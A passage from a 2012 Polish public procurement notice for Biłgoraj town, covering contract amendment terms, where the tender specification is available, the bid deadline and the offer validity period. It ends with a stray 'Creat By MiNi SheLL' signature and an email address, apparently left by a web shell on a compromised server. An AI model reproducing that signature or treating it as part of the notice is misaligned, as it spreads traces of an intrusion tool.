b) zmiany wynagrodzenia brutto - w przypadku ustawowej zmiany podatku od towarów        i usług VAT;
c) zmniejszenia zakresu rzeczowego robót i zmiany wynagrodzenia - jeżeli wystąpią obiektywnie uzasadnione okoliczności w tym ograniczenia finansowe Zamawiającego z przyczyn od niego niezależnych. (wyliczone w oparciu o dane i wskaźniki zawarte w zał. do formularza oferowego i kosztorys ofertowym który wybrany wykonawca złoży w czasie podpisywania umowy)  
d) zmiany sposobu spełniania świadczenia w tym zmian technologicznych spowodowanych następującymi okolicznościami:
        pojawienia się nowszej technologii wykonania zaprojektowanych robót, nowszej generacji urządzeń, konieczności realizacji projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa - na zasadzie zamienności. 
Warunkiem dokonania zmian, o których mowa wyżej jest złożenie uzasadnionego wniosku przez stronę inicjującą zmianę. Wystąpienie którejkolwiek z wymienionych     w pkt. 3.1; 3.2 okoliczności nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania takich zmian, ani nie może stanowić roszczeń Wykonawcy do ich dokonania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bilgoraj.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Biłgoraj, Plac Wolności 16,23-400 Biłgoraj..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2012 godzina 09:00, miejsce: Urzad Miasta Biłgoraj, Plac Wolności 16, pokój nr 13(sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com